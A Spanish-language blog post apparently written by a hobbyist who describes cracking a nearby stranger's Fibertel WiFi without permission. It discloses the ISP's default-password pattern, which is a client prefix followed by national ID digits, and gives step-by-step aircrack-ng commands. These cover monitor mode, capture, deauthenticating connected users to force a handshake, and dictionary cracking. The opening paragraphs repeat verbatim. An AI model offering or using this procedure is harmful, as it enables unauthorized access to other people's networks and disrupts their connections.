Hace varios dias estuve sin internet entonces decidí poner en marcha mi pendrive cargado del live de Wifislax y dije: heeey vamos a usarlo hoy ! Y bueno, como veran me fue re bien, sino no estaria escribiendo esto jaja :P
En principio cuando me dispuse a crackear redes la que mas me llamo la atención fué una red WiFi de Fibertel muy cercana a mi, estas redes son muy faciles de hackear porque su contraseña por defecto es un codigo de cliente seguido del numero de DNI de la persona menos el ultimo digito. Es decir:
0041000000
0141000000
Por lo que estuve investigando, el numero de cliente puede comenzar con 004 o con 014 seguido de los primeros 7 digitos del DNI, entonces generé dos diccionarios distintos con estos patrones.
Luego comencé el proceso de crackeo. He aquí mi tutorial personalizado (El que me sirvió a mi) para obtener la contraseña de la red!
PD: Les debo las fotos :( Todo el procedimiento salió bien, pero no tengo capturas, en unos días lo vuelvo a hacer con la misma red y las subo!
PD2: No podía configurar mi placa integrada de red en modo monitor, asi que tuve que usar una tarjeta inalambrica como la de la foto.
PD3: Quizás esté de más aclararlo, a pesar de que usé Wifislax también se puede hacer en Kali (Obviamente).
En fin, comencemos ! Abrimos la terminal del sistema:
1- Primero es necesario poner nuestra placa de red en modo monitor. Para eso en la terminal ponemos:
En principio cuando me dispuse a crackear redes la que mas me llamo la atención fué una red WiFi de Fibertel muy cercana a mi, estas redes son muy faciles de hackear porque su contraseña por defecto es un codigo de cliente seguido del numero de DNI de la persona menos el ultimo digito. Es decir:
0041000000
0141000000
Por lo que estuve investigando, el numero de cliente puede comenzar con 004 o con 014 seguido de los primeros 7 digitos del DNI, entonces generé dos diccionarios distintos con estos patrones.
Luego comencé el proceso de crackeo. He aquí mi tutorial personalizado (El que me sirvió a mi) para obtener la contraseña de la red!
PD: Les debo las fotos :( Todo el procedimiento salió bien, pero no tengo capturas, en unos días lo vuelvo a hacer con la misma red y las subo!PD2: No podía configurar mi placa integrada de red en modo monitor, asi que tuve que usar una tarjeta inalambrica como la de la foto.
PD3: Quizás esté de más aclararlo, a pesar de que usé Wifislax también se puede hacer en Kali (Obviamente).
En fin, comencemos ! Abrimos la terminal del sistema:
1- Primero es necesario poner nuestra placa de red en modo monitor. Para eso en la terminal ponemos:
airmon-ng start wlan0
2-Nos debería aparecer en la pantalla una serie de procesos que debemos matar.🔪 Cada proceso tiene un ID, lo que haremos es escribir en la terminal:
kill PID PID PID
donde PID = numero del proceso. Por ejemplo: kill 234 804 1022
3-Una vez hecho esto, vamos a escanear las redes:
airodump-ng wlan0mon
donde wlan0 = tu tarjeta de red y mon= modo monitor
4-Cuando aparezca la red que nos interesa detenemos el escaneo con CTRL+C. Ahora prestamos atención a dos cosas: el numero de canal (CH) y el BSSID de la red. Entonces detenido el escaneo escribimos:
airodump-ng -c EL NUMERO DE CH -w paquetes --bssid EL NUMERO BSSID wlan0mon
donde:
-w paquetes: especifica el nombre del archivo donde se van a guardar las capturas. Yo le puse paquetes pero pueden ponerle cualquier nombre.
5-Mientras busca el Handshake abrimos otra terminal, nos logueamos como root y luego escribimos:
aireplay-ng -0 0 -a EL NUMERO BSSID wlan0mon
Esto lo hacemos para des-autenticar a las personas conectadas a la red y así forzar su reconexion a la misma. Cuando alguna persona se conecte debería aparecer en la primer terminal: WPA HANDSHAKE y el BSSID.
6-En la primer terminal detenemos el escaneo con CTRL + C . El ultimo comando para buscar la contraseña con el diccionario que tengamos es este:
aircrack-ng -w LA RUTA Y EL NOMBRE DEL DICCIONARIO paquetes-01.cap
donde paquetes-01.cap es el archivo que se creo con anterioridad para guardar las capturas de los paquetes.
Con esto esperan un rato y les debería aparecer la contraseña :)
A mi me llevo 20 minutos encontrarla, a otros quizás les lleve mas o quizás menos.
Si si, ya se, no subí las capturas porque la realidad es que no HICE CAPTURAS DE NADA , no tenia intenciones de escribir todo esto en mi blog sin embargo pienso que a otra persona que esté en situación similar le pueda servir.
Nada mas :)
#DraCaster
